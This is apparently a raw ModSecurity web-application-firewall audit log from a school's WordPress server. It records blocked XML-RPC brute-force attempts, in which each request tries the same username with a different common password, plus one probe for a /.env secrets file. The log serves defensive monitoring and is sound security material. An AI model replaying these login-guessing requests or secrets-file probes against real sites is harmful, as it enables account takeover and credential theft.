Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071706430054 4222 (- - -)
Stopwatch2: 1745071706430054 4222; combined=3248, p1=371, p2=2701, p3=0, p4=0, p5=102, sr=97, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f896c86f-Z--
--22fc3c71-A--
[19/Apr/2025:21:09:31 +0700] aAOumw6cTFSgLAHl7PrWlQAAAAs 103.236.140.4 49224 103.236.140.4 8181
--22fc3c71-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--22fc3c71-C--
wp.getUsersBlogs
wakahumas
shaggy
--22fc3c71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--22fc3c71-E--
--22fc3c71-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071771611255 5366 (- - -)
Stopwatch2: 1745071771611255 5366; combined=3909, p1=508, p2=3231, p3=0, p4=0, p5=100, sr=92, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--22fc3c71-Z--
--de488737-A--
[19/Apr/2025:21:10:33 +0700] aAOu2XNa4dA2HllpK_N6cQAAAJE 103.236.140.4 49496 103.236.140.4 8181
--de488737-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--de488737-C--
wp.getUsersBlogs
wakahumas
monkey1
--de488737-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--de488737-E--
--de488737-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071833303590 5233 (- - -)
Stopwatch2: 1745071833303590 5233; combined=4130, p1=496, p2=3462, p3=0, p4=0, p5=103, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--de488737-Z--
--ca99af43-A--
[19/Apr/2025:21:11:07 +0700] aAOu-0ruoUXZj665VUH08AAAANI 103.236.140.4 49642 103.236.140.4 8181
--ca99af43-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.223.62.250
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.223.62.250
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--ca99af43-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ca99af43-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745071867865631 655 (- - -)
Stopwatch2: 1745071867865631 655; combined=267, p1=233, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ca99af43-Z--
--7c73b932-A--
[19/Apr/2025:21:11:35 +0700] aAOvF0ruoUXZj665VUH09wAAAMQ 103.236.140.4 49756 103.236.140.4 8181
--7c73b932-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7c73b932-C--
wp.getUsersBlogs
wakahumas
Marketing2023
--7c73b932-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7c73b932-E--
--7c73b932-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071895564188 5183 (- - -)
Stopwatch2: 1745071895564188 5183; combined=3684, p1=446, p2=3068, p3=0, p4=0, p5=100, sr=79, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7c73b932-Z--
--6fdafd16-A--
[19/Apr/2025:21:12:35 +0700] aAOvUw6cTFSgLAHl7PrW1wAAAAY 103.236.140.4 50068 103.236.140.4 8181
--6fdafd16-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6fdafd16-C--
wp.getUsersBlogs
wakahumas
212121
--6fdafd16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6fdafd16-E--
--6fdafd16-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071955684190 4492 (- - -)
Stopwatch2: 1745071955684190 4492; combined=3371, p1=388, p2=2708, p3=0, p4=0, p5=180, sr=82, sw=95, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6fdafd16-Z--
--04dbc72e-A--
[19/Apr/2025:21:13:38 +0700] aAOvkuvDiFC_ir7MDwbkbwAAAE8 103.236.140.4 51422 103.236.140.4 8181
--04dbc72e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--04dbc72e-C--
wp.getUsersBlogs
wakahumas
liverpool1
--04dbc72e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--04dbc72e-E--
--04dbc72e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072018743807 4952 (- - -)
Stopwatch2: 1745072018743807 4952; combined=3659, p1=443, p2=3007, p3=0, p4=0, p5=119, sr=83, sw=90, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--04dbc72e-Z--
--738c2537-A--
[19/Apr/2025:21:14:41 +0700] aAOv0Q6cTFSgLAHl7PrX1AAAABc 103.236.140.4 54250 103.236.140.4 8181
--738c2537-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--738c2537-C--
wp.getUsersBlogs
wakahumas
dancer
--738c2537-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--738c2537-E--
--738c2537-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072081089971 16997 (- - -)
Stopwatch2: 1745072081089971 16997; combined=27406, p1=515, p2=3070, p3=0, p4=0, p5=11924, sr=154, sw=72, l=0, gc=11825
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--738c2537-Z--
--d22a7526-A--
[19/Apr/2025:21:15:41 +0700] aAOwDUruoUXZj665VUH2pgAAANU 103.236.140.4 56536 103.236.140.4 8181
--d22a7526-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d22a7526-C--
wp.getUsersBlogs
wakahumas
marketing2021
--d22a7526-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d22a7526-E--
--d22a7526-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072141673374 4836 (- - -)
Stopwatch2: 1745072141673374 4836; combined=3786, p1=430, p2=3187, p3=0, p4=0, p5=100, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d22a7526-Z--
--5362115a-A--
[19/Apr/2025:21:16:41 +0700] aAOwSUruoUXZj665VUH36AAAANE 103.236.140.4 59528 103.236.140.4 8181
--5362115a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 232
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5362115a-C--
wp.getUsersBlogs
wakahumas
smkn22-jkt_sch_id
--5362115a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5362115a-E--
--5362115a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072201702478 4583 (- - -)
Stopwatch2: 1745072201702478 4583; combined=3190, p1=401, p2=2649, p3=0, p4=0, p5=83, sr=82, sw=57, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5362115a-Z--
--da772d61-A--
[19/Apr/2025:21:17:49 +0700] aAOwjevDiFC_ir7MDwbmxQAAAFg 103.236.140.4 35610 103.236.140.4 8181
--da772d61-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--da772d61-C--
wp.getUsersBlogs
wakahumas
PASS
--da772d61-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da772d61-E--
--da772d61-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072269971801 5060 (- - -)
Stopwatch2: 1745072269971801 5060; combined=3617, p1=459, p2=2988, p3=0, p4=0, p5=101, sr=86, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da772d61-Z--
--a8463b07-A--
[19/Apr/2025:21:18:49 +0700] aAOwyUruoUXZj665VUH6wQAAAMM 103.236.140.4 41708 103.236.140.4 8181
--a8463b07-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a8463b07-C--
wp.getUsersBlogs
wakahumas
playboy
--a8463b07-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a8463b07-E--
--a8463b07-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072329151305 5600 (- - -)
Stopwatch2: 1745072329151305 5600; combined=3735, p1=449, p2=3082, p3=0, p4=0, p5=122, sr=78, sw=82, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a8463b07-Z--
--dfe49e5d-A--
[19/Apr/2025:21:19:56 +0700] aAOxDHNa4dA2HllpK_OAegAAAIw 103.236.140.4 48494 103.236.140.4 8181
--dfe49e5d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--dfe49e5d-C--
wp.getUsersBlogs
wakahumas
london12
--dfe49e5d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dfe49e5d-E--
--dfe49e5d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072396606736 7703 (- - -)
Stopwatch2: 1745072396606736 7703; combined=5811, p1=662, p2=4922, p3=0, p4=0, p5=132, sr=117, sw=95, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dfe49e5d-Z--
--ecbe990c-A--
[19/Apr/2025:21:20:56 +0700] aAOxSEruoUXZj665VUH9-wAAAMg 103.236.140.4 54664 103.236.140.4 8181
--ecbe990c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ecbe990c-C--
wp.getUsersBlogs
wakahumas
123qwe
--ecbe990c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ecbe990c-E--
--ecbe990c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072456055336 4054 (- - -)
Stopwatch2: 1745072456055336 4054; combined=2791, p1=358, p2=2303, p3=0, p4=0, p5=78, sr=73, sw=52, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ecbe990c-Z--
--7a5c7e0b-A--
[19/Apr/2025:21:21:56 +0700] aAOxhA6cTFSgLAHl7PrhWAAAAAM 103.236.140.4 32810 103.236.140.4 8181
--7a5c7e0b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7a5c7e0b-C--
wp.getUsersBlogs
wakahumas
123789
--7a5c7e0b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7a5c7e0b-E--
--7a5c7e0b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072516214770 4159 (- - -)
Stopwatch2: 1745072516214770 4159; combined=3061, p1=368, p2=2542, p3=0, p4=0, p5=90, sr=76, sw=61, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7a5c7e0b-Z--
--e8300f0b-A--
[19/Apr/2025:21:22:56 +0700] aAOxwHNa4dA2HllpK_OEqwAAAJM 103.236.140.4 39046 103.236.140.4 8181
--e8300f0b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e8300f0b-C--
wp.getUsersBlogs
wakahumas
P@SSWORD
--e8300f0b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e8300f0b-E--
--e8300f0b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072576257633 4227 (- - -)
Stopwatch2: 1745072576257633 4227; combined=3288, p1=386, p2=2758, p3=0, p4=0, p5=86, sr=78, sw=58, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e8300f0b-Z--
--22ae3d7b-A--
[19/Apr/2025:21:24:02 +0700] aAOyAkruoUXZj665VUEDGgAAAMw 103.236.140.4 45930 103.236.140.4 8181
--22ae3d7b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
